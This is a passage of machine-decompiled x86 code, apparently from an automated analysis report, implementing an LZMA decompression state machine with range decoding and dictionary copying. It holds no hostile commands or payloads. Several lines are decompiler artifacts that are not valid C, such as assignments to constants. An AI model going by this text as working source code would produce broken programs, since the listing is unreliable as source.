									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
